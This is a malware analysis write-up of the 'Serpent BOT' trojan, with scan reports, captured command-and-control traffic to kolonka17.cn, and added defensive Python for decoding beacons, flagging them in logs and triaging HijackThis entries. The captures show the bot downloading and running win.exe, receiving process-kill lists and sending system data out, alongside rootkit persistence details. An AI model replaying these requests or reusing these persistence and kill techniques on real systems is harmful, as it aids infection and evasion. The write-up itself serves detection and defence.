Serpent BOT (Web Based Malware)

Steve sent me another malware sample he found, but this time it is web-based malware controlled through a web interface:

[Image: Web Based Malware web interface]

The file that established connections with the website was named load.exe; below is the scan report:

Report Generated 22.11.2008 at 23.15.36 (GMT 1)
Filename: load.exe
File size: 27 KB
MD5 Hash: 97A860C202A8016E08818F3AA90525B8
SHA1 Hash: CADF466ABD29CD993DD81EC838282589D0077BAC
CRC32: 89416946
Application Type: Executable (EXE) 32bit
Packer detected: Microsoft Visual C++ 6.0
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection Rate: 23 on 23

Antivirus Result
a-squared Trojan-Downloader.Agent!IK
Avira AntiVir TR/Dldr.Agent.agl
Avast Win32:Small-JMK [Trj] (0)
AVG Trojan horse Downloader.Zlob.12.R
BitDefender Trojan.Crypt.AI
ClamAV Worm.Socks-11
Comodo TrojWare.Win32.PSW.Agent.NHG
Dr.Web Trojan.PWS.Pace
Ewido Downloader.Agent.llo
F-PROT 6 W32/Socks.A.gen!Eldorado (generic, not disinfectable)
G DATA Trojan-Downloader.Win32.Agent.llo A
IkarusT3 Trojan-Downloader.Agent
Kaspersky Trojan-Downloader.Win32.Agent.llo
McAfee BackDoor-DRW trojan
MHR (Malware Hash Registry) Virus Found – detect rate 75%
NOD32 v3 Win32/PSW.Agent.NHG trojan
Norman Trojan W32/Agent.EXZF ()
QuickHeal TrojanDownloader.Agent.llo
Solo Antivirus Infection TrojanDropper.Win32.Small.Bgx
Sophos Troj/Dloadr-BMT
TrendMicro WORM_SOCKS.BL
VBA32 Trojan-Downloader.Win32.Agent.llo
VirusBuster Trojan.DL.Agent.ETEH

When I executed this load.exe file, a lot of traffic was established with this domain:

kolonka17.cn

Internet traffic:

GET /loader/?&v=ver&s=9988 HTTP/1.1
User-Agent: _
Host: kolonka17.cn

In the traffic below, another executable named win.exe is downloaded and executed on my system:

GET /loader/manda.php?id=-695459345&v=ver&s=9988 HTTP/1.1
User-Agent: _
Host: kolonka17.cn
Cookie: PHPSESSID=c153aa8346175853a68924e15fcbb0bf
 
HTTP/1.1 200 OK
Server: Apache/2
Content-length: 29
 
hxxp://kolonka17.cn/win.exe|5
 
GET /win.exe HTTP/1.1
User-Agent: _
Host: kolonka17.cn
Cookie: PHPSESSID=c153aa8346175853a68924e15fcbb0bf

Next we see traffic to a new host, to which it sends a lot of encrypted data in the request path:

GET /40E8001431303134393536323335383537393339333234386C0000018D66000000007600000642EB00053085858585 HTTP/1.0
Host: 69.147.239.106
 
HTTP/1.0 200 OK
Date: Sat, 22 Nov 2008 09:04:03 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch9
Last-Modified: Sat, 22 Nov 2008 09:04:03 GMT
Cache-Control: no-cache
Content-Length: 107532
Connection: close
Content-Type: application/octet-stream
...
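Decoding the hex request path above shows what that "encrypted" data actually contains. The following Python is an added example written for this note, not the author's tooling: it hex-decodes the path from the capture, runs a strings(1)-style pass over the bytes, and reads bytes 2 and 3 as a big-endian length. That length-field reading is my assumption, based only on the fact that 0x0014 = 20 matches the 20 ASCII digits that follow it.

```python
"""Decode the hex request path sent to 69.147.239.106 (copied from the capture above).

Added example for this note. The field layout (2-byte big-endian length at
offset 2, then an ASCII identifier) is my assumption from the bytes, not a
documented protocol of the bot."""
import string

# Request path exactly as it appears in the capture in the post.
CAPTURED_PATH = "40E8001431303134393536323335383537393339333234386C0000018D66000000007600000642EB00053085858585"

# Printable ASCII minus whitespace control characters, for a strings(1)-style pass.
PRINTABLE = set(string.printable) - set("\t\n\r\x0b\x0c")


def printable_runs(data, min_len=4):
    """Return runs of at least min_len printable ASCII characters, like strings(1)."""
    runs, current = [], []
    for b in data + b"\x00":            # trailing NUL flushes the last run
        if b < 0x80 and chr(b) in PRINTABLE:
            current.append(chr(b))
            continue
        if len(current) >= min_len:
            runs.append("".join(current))
        current = []
    return runs


def decode_path(path):
    """Hex-decode the request path and split it by the assumed length-prefixed layout."""
    raw = bytes.fromhex(path.strip("/"))
    declared_len = int.from_bytes(raw[2:4], "big")   # 0x0014 == 20 in the capture (assumed length field)
    ident = raw[4:4 + declared_len]
    return {
        "total_bytes": len(raw),
        "header": raw[:2].hex(),                      # two leading bytes of unknown meaning
        "declared_len": declared_len,
        "id": ident.decode("ascii", errors="replace"),
        "id_is_digits": ident.isdigit(),
        "trailer": raw[4 + declared_len:],            # remaining opaque bytes
        "strings": printable_runs(raw),
    }


if __name__ == "__main__":
    info = decode_path(CAPTURED_PATH)
    print(f"{info['total_bytes']} bytes, declared length {info['declared_len']}, id {info['id']}")
    print("printable runs:", info["strings"])
    print("trailer:", info["trailer"].hex())
```

Of the 47 bytes, 20 are a plain-ASCII numeric identifier and only the 23-byte trailer is opaque, so the "encryption" covers a small part of the request; a long decimal run inside a hex-only URL path is itself something a proxy-log search can look for.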

Below is some more interesting traffic:

GET /loader/manda.php?id=-789987028&l=5&v=ver&s=9988 HTTP/1.1
User-Agent: _
Host: kolonka17.cn
Cookie: PHPSESSID=c153aa8346175853a68924e15fcbb0bf
 
HTTP/1.1 200 OK
Date: Sat, 22 Nov 2008 14:00:06 GMT
Server: Apache/2
Content-Length: 2
 
ok
 
GET /loader/proc_kill HTTP/1.1
User-Agent: _
Host: kolonka17.cn
Cookie: PHPSESSID=c153aa8346175853a68924e15fcbb0bf
 
HTTP/1.1 200 OK
Date: Sat, 22 Nov 2008 14:00:07 GMT
Server: Apache/2
Last-Modified: Wed, 12 Nov 2008 09:23:38 GMT
Content-Length: 185
Content-Type: text/plain
 
regedit.exe
msconfig.exe
taskmgr.exe
reg.exe
taskkill.exe
tskill.exe
tasklist.exe
infium.exe
notepad.exe
explorer.exe
nod32kui.exe
nod32kui.exe
egui.exe
egui.exe
putty.exe

The malware now gets the command to kill a list of processes on my system:

GET /loader/proc_kill HTTP/1.1

But the malware does not stop at killing processes: it also deletes important system executables, such as:

C:\WINDOWS\explorer.exe

In the new traffic below we can see that the malware received another command:

GET /loader/proc_run HTTP/1.1
User-Agent: _
Host: kolonka17.cn
Cookie: PHPSESSID=c153aa8346175853a68924e15fcbb0bf
 
HTTP/1.1 200 OK
Date: Sat, 22 Nov 2008 14:00:14 GMT
Server: Apache/2
Content-Length: 30
Content-Type: text/plain
 
none.exe
taskmon.exe
qip.exe
 
GET /loader/proc_killsize HTTP/1.1
User-Agent: _
Host: kolonka17.cn
Cookie: PHPSESSID=c153aa8346175853a68924e15fcbb0bf
 
HTTP/1.1 200 OK
Date: Sat, 22 Nov 2008 14:00:10 GMT
Server: Apache/2
Content-Length: 40
Content-Type: text/plain
 
tasklis2t.exe
inf3ium.exe
note4pad.exe

Both are again related to process killing. Afterwards, new traffic was sent to the domain:

POST /loader/data.php?id=-789987028 HTTP/1.1
Host: kolonka17.cn
Content-Type: application/x-www-form-urlencoded
Content-length: 289
 
proc=[System Process]
smss.exe
csrss.exe
winlogon.exe
services.exe
lsass.exe
svchost.exe
spoolsv.exe
explorer.exe
alg.exe
wscntfy.exe
ufo.exe
load.exe
14B.tmp
size=12800
0
0
0
108032
13312
14336
57856
13824
51200
27648
12800
 
HTTP/1.1 200 OK
Date: Sat, 22 Nov 2008 14:00:22 GMT
Content-Length: 0
Content-Type: text/html

We can see that the malware sent information about the processes currently running on my system, and note that it also sent the size of each process. This information could be used by future malware versions, perhaps to build evasion code or to detect certain processes the malware "does not like".
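The beacon pattern in these captures (a fixed Host, the /loader/ command paths, the literal User-Agent `_`, the `v=ver` query) is easy to turn into a proxy-log check, and the data.php body can be decoded to see exactly what the operator learned about the host. The Python below is an added example, not the author's code: the indicators come from the captures in this post, while the proxy-log format and its sample lines are constructed for the example.

```python
"""Triage helpers for the loader traffic shown in this post.

Added example, not the author's code. Indicators come from the captures above;
the proxy-log format and the sample lines are constructed for the example."""
import csv
import io
import re
from urllib.parse import unquote, urlsplit

# Indicators observed in the post's captures.
C2_HOSTS = {"kolonka17.cn"}
LOADER_PATH = re.compile(r"^/loader/(?:manda\.php|data\.php|proc_kill|proc_run|proc_killsize)?(?:\?|$)")
BEACON_QUERY = re.compile(r"(?:^|&)v=ver(?:&|$)")
BOT_USER_AGENT = "_"

# Constructed proxy log (CSV columns: time,src,method,host,path,user_agent).
SAMPLE_LOG = """\
2008-11-22T14:00:05,10.0.0.5,GET,kolonka17.cn,/loader/?&v=ver&s=9988,_
2008-11-22T14:00:06,10.0.0.5,GET,kolonka17.cn,/loader/manda.php?id=-789987028&l=5&v=ver&s=9988,_
2008-11-22T14:00:07,10.0.0.5,GET,kolonka17.cn,/loader/proc_kill,_
2008-11-22T14:00:08,10.0.0.5,GET,www.example.com,/index.html,Mozilla/5.0
2008-11-22T14:00:22,10.0.0.5,POST,kolonka17.cn,/loader/data.php?id=-789987028,_
2008-11-22T14:01:00,10.0.0.9,GET,cdn.example.net,/loader/?v=ver&s=9988,Mozilla/5.0
2008-11-22T14:01:30,10.0.0.9,GET,intranet.example.com,/status,_
"""


def indicators(host, path, user_agent):
    """Return the list of indicators a single request matches."""
    hits = []
    if host.lower() in C2_HOSTS:
        hits.append("known C2 host")
    if LOADER_PATH.match(path):
        hits.append("/loader/ command path")
    if BEACON_QUERY.search(urlsplit(path).query):
        hits.append("v=ver beacon query")
    if user_agent == BOT_USER_AGENT:
        hits.append("User-Agent '_'")
    return hits


def flag_beacons(log_text, threshold=2):
    """Flag rows matching at least `threshold` indicators; one weak indicator alone is not enough."""
    fields = ["time", "src", "method", "host", "path", "ua"]
    flagged = []
    for row in csv.DictReader(io.StringIO(log_text), fieldnames=fields):
        hits = indicators(row["host"], row["path"], row["ua"])
        if len(hits) >= threshold:
            flagged.append({"time": row["time"], "src": row["src"], "host": row["host"],
                            "path": row["path"], "why": hits})
    return flagged


# Body of the data.php POST, transcribed from the capture above (newline-separated lists).
CAPTURED_BODY = (
    "proc=" + "\n".join(["[System Process]", "smss.exe", "csrss.exe", "winlogon.exe", "services.exe",
                         "lsass.exe", "svchost.exe", "spoolsv.exe", "explorer.exe", "alg.exe",
                         "wscntfy.exe", "ufo.exe", "load.exe", "14B.tmp"])
    + "\nsize=" + "\n".join(["12800", "0", "0", "0", "108032", "13312", "14336", "57856",
                             "13824", "51200", "27648", "12800"])
)


def decode_inventory(body):
    """Split the data.php body into the process names and sizes the bot reported.

    The capture has 14 names but only 12 sizes, so the two lists are returned
    separately instead of being zipped into (name, size) pairs."""
    body = unquote(body).replace("\r\n", "\n").replace("&size=", "\nsize=")  # raw urlencoded form
    proc_part, _, size_part = body.partition("\nsize=")
    names = [p for p in proc_part[len("proc="):].split("\n") if p]
    sizes = [int(s) for s in size_part.split("\n") if s.strip()]
    return {"processes": names, "sizes": sizes}


if __name__ == "__main__":
    for hit in flag_beacons(SAMPLE_LOG):
        print(hit["time"], hit["src"], hit["host"] + hit["path"], "->", ", ".join(hit["why"]))
    inv = decode_inventory(CAPTURED_BODY)
    print(len(inv["processes"]), "processes reported, last three:", inv["processes"][-3:])
    print(len(inv["sizes"]), "sizes reported:", inv["sizes"])
```

The threshold of two indicators is deliberate: the bare User-Agent `_` alone would match legitimate but sloppy clients, whereas a `/loader/` path together with the `v=ver` query catches the same bot on a host that is not yet on the block list, so the script reports both the match and the reasons for an analyst to weigh.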

Next there was traffic on the SMTP port (25):

Protocol          : TCP
Local Address     : 64.233.183.27
Local Port        : 25
 
220 mx.google.com ESMTP k5si310246nfh.0
 
Protocol          : TCP
Local Address     : 209.85.135.114
Local Port        : 25
 
220 mx.google.com ESMTP n10si1763302mue.37
 
Protocol          : TCP
Local Address     : 94.100.176.20
Local Port        : 25
 
220 Mail.Ru ESMTP
 
Protocol          : TCP
Local Address     : 216.157.145.27
Local Port        : 25
 
220 mail7.hsphere.cc ESMTP mail7.hsphere.cc; Sat Nov 22 09:20:00 2008

And a new driver is loaded by the malware:

C:\WINDOWS\system32\drivers\Winkk44.sys

Scan report:

Report Generated 22.11.2008 at 23.32.46 (GMT 1)
Filename: Winkk44.sys
File size: 32 KB
MD5 Hash: 286C4C43EFED1D81C59AA7BC70B83BD8
SHA1 Hash: 4D09AC6BE2808360697E7ECA71BEBF7CADFDE985
CRC32: 2495620378
Application Type: Executable (EXE) 32bit
Packer detected: Nothing found [Overlay] *
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection Rate: 7 on 24

Antivirus Result
a-squared Trojan-Dropper.Cutwail!IK
Avira AntiVir –
Avast –
AVG Virus found BackDoor.Ntrootkit
BitDefender Trojan.Dropper.Cutwail.D
ClamAV –
Comodo –
Dr.Web –
Ewido –
F-PROT 6 –
G DATA Trojan-Downloader.Win32.Mutant.aim A
IkarusT3 Trojan-Dropper.Cutwail
Kaspersky Trojan-Downloader.Win32.Mutant.aim
McAfee –
MHR (Malware Hash Registry) –
NOD32 v3 –
Norman –
Panda –
QuickHeal –
Solo Antivirus Infection TrojanDownloader.Win32.Mutant.Aim
Sophos –
TrendMicro –
VBA32 –
VirusBuster –

Again a Trojan.Dropper.Cutwail.D!

Below are some interesting strings extracted from Winkk44.sys:

winlogon.exe
e:\0soft\loader\runtime3\objfre_wxp_x86\i386\runtime3.pdb
EXERESOURCE
\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\WinCtrl32
Asynchronous
Impersonate
StartShell
DLLName
WLEventStartShell
WinCtrl32.dll
\SystemRoot\system32\WinCtrl32.dll
ImagePath
Start
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\
\DosDevices\Rntm74
\Device\Rntm74
\SystemRoot\system32\drivers\
\FileSystem
Winkk44.sys

As we can see from the image below, this driver is auto-loaded even when the operating system boots in Safe Mode:

[Image: Kernel driver loaded in safe mode]

During the analysis no SSDT/Shadow SSDT hooks and no stealth code were detected; I got a BSOD when trying to open certain anti-rootkit software; the file Winkk44.sys is protected against modification and deletion, and its registry keys are protected in the same way.

Running processes visible in Task Manager:

[Image: Running processes]

Registry keys used by the malware to start with Windows:

[Image: Registry keys]

Service info:

[Image: Registry keys of the rootkit driver]

These are the malware traces visible in a HijackThis log:

Running processes:
C:\WINDOWS\system32\drivers\ctfmon.exe
%User%\Local Settings\Application Data\spool.exe
%User%\Local Settings\Application Data\spool.exe
%User%\Local Settings\Application Data\spool.exe
 
O2 - BHO: pl - {B200799F-9538-403d-9A6E-36F5942EC540} - C:\WINDOWS\system32\fklame32.dll (file missing)
O4 - HKLM\..\Run: [ntuser] C:\WINDOWS\system32\drivers\ctfmon.exe
O4 - HKLM\..\Run: [autoload] %User%\Local Settings\Application Data\spool.exe
O4 - HKCU\..\Run: [ntuser] C:\WINDOWS\system32\drivers\ctfmon.exe
O4 - HKCU\..\Run: [autoload] %User%\Local Settings\Application Data\spool.exe
O4 - HKUS\S-1-5-18\..\Run: [ntuser] C:\WINDOWS\system32\drivers\ctfmon.exe (User 'SYSTEM')
O4 - HKUS\S-1-5-18\..\Run: [autoload] C:\Documents and Settings\LocalService\Local Settings\Application Data\spool.exe (User 'SYSTEM')
O20 - Winlogon Notify: WinCtrl32 - C:\WINDOWS\SYSTEM32\WinCtrl32.dll
O23 - Service: Task Scheduler (Schedule) - Unknown owner - C:\WINDOWS\system32\drivers\ctfmon.exe
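The entries above can be turned into a small triage script for HijackThis logs collected from other hosts. This Python is an added example, not part of the original post or of HijackThis: the run-value names, file names and locations are the ones this post lists, and the sample log is constructed from the entries above plus two benign lines (an MSMSGS Run value and a W32Time service) to show what is not flagged.

```python
"""Flag this sample's persistence entries in a HijackThis log.

Added example, not part of the post or of HijackThis. Names and locations are
the ones listed in the post; the sample log is the post's entries plus two
constructed benign lines."""
import re

# Run-value names and file names used by this sample (from the post).
SAMPLE_RUN_NAMES = {"ntuser", "autoload"}
SAMPLE_FILES = {"spool.exe", "winctrl32.dll", "fklame32.dll", "winkk44.sys", "555.exe", "ftpdll.dll"}

O2_RE = re.compile(r"^O2 - BHO: (?P<name>.*?) - (?P<clsid>\{[^}]+\}) - (?P<path>.+?)(?P<missing> \(file missing\))?$")
O4_RE = re.compile(r"^O4 - (?P<hive>\S+?)\\\.\.\\Run: \[(?P<name>[^\]]+)\] (?P<cmd>.+?)(?: \(User '[^']*'\))?$")
O20_RE = re.compile(r"^O20 - Winlogon Notify: (?P<key>\S+) - (?P<dll>.+)$")
O23_RE = re.compile(r"^O23 - Service: (?P<svc>.+?) - (?P<owner>.+?) - (?P<path>.+)$")


def suspicious_path(path):
    """Reason a binary path matches this sample's patterns, or None."""
    p = path.strip().strip('"').lower()
    base = p.rsplit("\\", 1)[-1]
    if base in SAMPLE_FILES:
        return f"file name used by this sample: {base}"
    # ctfmon.exe is a legitimate Microsoft binary in system32; the copy under drivers\ is the sample's.
    if base == "ctfmon.exe" and "\\system32\\drivers\\" in p:
        return "ctfmon.exe outside its normal location"
    if p.endswith(".exe") and "\\system32\\drivers\\" in p:
        return "executable launched from the drivers directory"
    if p.endswith(".exe") and "\\local settings\\application data\\" in p:
        return "executable run from per-user Application Data"
    return None


def exe_from_command(cmd):
    """First path of a Run command line (quoted or bare), with arguments dropped."""
    cmd = cmd.strip()
    if cmd.startswith('"'):
        return cmd.split('"')[1]
    return re.split(r"\s+[/-]", cmd)[0]


# Constructed log: the post's entries plus two benign lines (MSMSGS, W32Time).
SAMPLE_HJT_LOG = r"""
Running processes:
C:\WINDOWS\system32\drivers\ctfmon.exe
%User%\Local Settings\Application Data\spool.exe
%User%\Local Settings\Application Data\spool.exe
%User%\Local Settings\Application Data\spool.exe
C:\WINDOWS\system32\svchost.exe

O2 - BHO: pl - {B200799F-9538-403d-9A6E-36F5942EC540} - C:\WINDOWS\system32\fklame32.dll (file missing)
O4 - HKLM\..\Run: [ntuser] C:\WINDOWS\system32\drivers\ctfmon.exe
O4 - HKLM\..\Run: [autoload] %User%\Local Settings\Application Data\spool.exe
O4 - HKCU\..\Run: [ntuser] C:\WINDOWS\system32\drivers\ctfmon.exe
O4 - HKCU\..\Run: [autoload] %User%\Local Settings\Application Data\spool.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKUS\S-1-5-18\..\Run: [ntuser] C:\WINDOWS\system32\drivers\ctfmon.exe (User 'SYSTEM')
O4 - HKUS\S-1-5-18\..\Run: [autoload] C:\Documents and Settings\LocalService\Local Settings\Application Data\spool.exe (User 'SYSTEM')
O20 - Winlogon Notify: WinCtrl32 - C:\WINDOWS\SYSTEM32\WinCtrl32.dll
O23 - Service: Task Scheduler (Schedule) - Unknown owner - C:\WINDOWS\system32\drivers\ctfmon.exe
O23 - Service: Windows Time (W32Time) - Unknown owner - C:\WINDOWS\system32\svchost.exe
"""


def triage(log_text):
    """Return findings as dicts with the HijackThis item type, the reason and the line."""
    findings, in_procs = [], False
    for line in log_text.splitlines():
        line = line.strip()
        if line == "Running processes:":
            in_procs = True
            continue
        if not line:                      # blank line ends the process section
            in_procs = False
            continue
        if in_procs:
            if why := suspicious_path(line):
                findings.append({"item": "process", "why": why, "line": line})
            continue
        if m := O4_RE.match(line):
            why = suspicious_path(exe_from_command(m["cmd"]))
            if m["name"].lower() in SAMPLE_RUN_NAMES:
                why = f"Run value name used by this sample: {m['name']}" + (f"; {why}" if why else "")
            if why:
                findings.append({"item": "O4", "why": why, "line": line})
        elif m := O20_RE.match(line):
            # Winlogon Notify packages load into winlogon.exe; the post's sample registers WinCtrl32 here.
            why = suspicious_path(m["dll"]) or "Winlogon Notify package (review)"
            findings.append({"item": "O20", "why": why, "line": line})
        elif m := O23_RE.match(line):
            if why := suspicious_path(m["path"]):
                findings.append({"item": "O23", "why": why, "line": line})
        elif m := O2_RE.match(line):
            why = suspicious_path(m["path"]) or (m["missing"] and "BHO whose DLL is missing")
            if why:
                findings.append({"item": "O2", "why": why, "line": line})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_HJT_LOG):
        print(f"{f['item']:8} {f['why']}: {f['line']}")
```

The location checks matter more than the names: ctfmon.exe is a real Windows binary, so only its copy under system32\drivers is treated as the sample's, and an .exe registered as a service from that directory or started from a per-user Application Data folder is flagged on location alone, which also catches renamed copies.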

Below is a short summary of the files created by the malware:

C:\WINDOWS\system32\ctfmon.exe
%User%\Local Settings\Application Data\spool.exe
%User%\ftpdll.dll
C:\WINDOWS\system32\WinCtrl32.dll
C:\WINDOWS\system32\fklame32.dll
C:\WINDOWS\system32\drivers\ctfmon.exe
C:\WINDOWS\system32\drivers\Winkk44.sys
C:\WINDOWS\system32\drivers\555.exe
